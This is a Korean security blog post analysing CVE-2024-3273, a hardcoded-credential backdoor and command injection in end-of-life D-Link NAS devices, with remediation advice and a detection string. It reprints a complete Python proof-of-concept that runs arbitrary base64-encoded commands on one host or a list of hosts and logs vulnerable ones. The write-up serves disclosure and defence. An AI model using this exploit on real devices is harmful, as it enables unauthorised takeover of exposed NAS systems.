1. 취약점
- 취약한 버전의 D-Link 사의 여러 NAS 제품들에서 발생하는 임의 명령 주입 공격 취약점
영향받는 버전
- DNS-320L 버전 1.11, 버전 1.03.0904.2013, 버전 1.01.0702.2013
- DNS-325 버전 1.01
- DNS-327L 버전 1.09, 버전 1.00.0409.2013
- DNS-340L 버전 1.08
2. 취약점 상세 [2]
- 취약점은 /cgi-bin/nas_sharing.cgi 엔드포인트에 존재
> /cgi-bin/nas_sharing.cgi에 하드코딩된 자격 증명을 악용해 권한 없는 사용자가 시스템에 접근하는 백도어로 사용
> 해당 엔드포인트에 user, passwd 매개변수와 system 매개변수를 설정해 GET 요청을 전송
① 백도어: 하드코딩된 user, passwd 매개변수를 이용
② 명령주입: system 매개변수를 이용하며, base64 인코딩을 적용해 전달
GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=<BASE64_ENCODED_COMMAND_TO_BE_EXECUTED>
3. PoC [3]
- cgi-bin/nas_sharing.cgi URL로 GET 요청을 전송
> user 매개변수의 값을 messagebus, passwd 매개변수의 값을 빈 값으로 설정
> system 매개변수의 값을 base64로 인코딩하여 전송
import requests
import base64
import threading
# Utility function for Base64 encoding
def encode_base64(command):
return base64.b64encode(command.encode()).decode()
# Watermark banner
print("""
┏┓┓┏┏┓ ┏┓┏┓┏┓┏┓ ┏┓┏┓━┓┏┓
┃ ┃┃┣ ━━┏┛┃┫┏┛┃┃━━ ┫┏┛ ┃ ┫
┗┛┗┛┗┛ ┗━┗┛┗━┗╋ ┗┛┗━ ╹┗┛
""")
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.1.153 Yowser/2.5 Safari/537.36",
"Accept-Encoding": "identity"
}
# Use a session for requests
session = requests.Session()
# Lock for file writing
file_write_lock = threading.Lock()
def execute_command(host, command=None, print_response=True):
if command is None:
command = 'id'
encoded_command = encode_base64(command)
url = f"http://{host}/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system={encoded_command}"
try:
response = session.get(url, headers=headers, timeout=10)
if 'root' in response.text:
with file_write_lock:
with open('vulnerables.txt', 'a') as f:
f.write(host + '\n')
print(f"Host {host} is vulnerable.")
elif print_response:
print(f"Response from {host}:")
print(response.text)
except requests.Timeout:
print(f"Request timed out for host {host}.")
except requests.ConnectionError as e:
print(f"Connection error for host {host}.")
except Exception as e:
print(f"An error occurred for host {host}.")
def execute_command_multiple(file_path, export):
with open(file_path, 'r') as file:
threads = []
for line in file:
host = line.strip().replace("\ufeff", "")
thread = threading.Thread(target=execute_command, args=(host, None, False))
thread.start()
threads.append(thread)
# Wait for all threads to complete
for thread in threads:
thread.join()
def main():
option = input("Choose an option (1: Single Host, 2: Multiple Hosts): ")
if option == '1':
host = input("Enter the host: ")
command = input("Enter the command to run: ")
execute_command(host, command)
elif option == '2':
file_path = input("Enter the file path containing hosts: ")
export = input("Export vulnerable host to vulnerables.txt? (y/n): ").lower()
execute_command_multiple(file_path, export)
else:
print("Invalid option.")
if __name__ == "__main__":
main()
4. 대응방안
- 해당 NAS 제품은 EOL(End Of Life, 지원 종료)에 도달해 더 이상 지원되지 않는 장비
> 벤더사는 관련 제품을 폐기하고 펌웨어 업데이트를 지원하는 제품으로 교체할 것을 권장 [4]
- 보안 장비 탐지 정책 적용
> cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd
5. 참고
[1] https://nvd.nist.gov/vuln/detail/CVE-2024-3273
[2] https://github.com/netsecfish/dlink?tab=readme-ov-file
[3] https://github.com/adhikara13/CVE-2024-3273
[4] https://supportannouncement.us.dlink.com/security/publication.aspx?name=SAP10383
[5] https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/
[6] https://www.boannews.com/media/view.asp?idx=128614&page=4&kind=1
'취약점 > Injection' 카테고리의 다른 글
| PHP-CGI Argument Injection 취약점 (CVE-2024-4577) (2) | 2024.06.10 |
|---|---|
| PaloAlto PAN-OS OS Command Injection (CVE-2024-3400) (1) | 2024.04.16 |
| MOVEit Transfer SQL Injection 취약점(CVE-2023-35036, CVE-2023-35708) (0) | 2023.06.17 |
| MOVEit Transfer SQL Injection 취약점(CVE-2023-34362) (1) | 2023.06.11 |
| Zyxel Firewall Unauthenticated remote command injection (CVE-2022-30525) (0) | 2023.02.05 |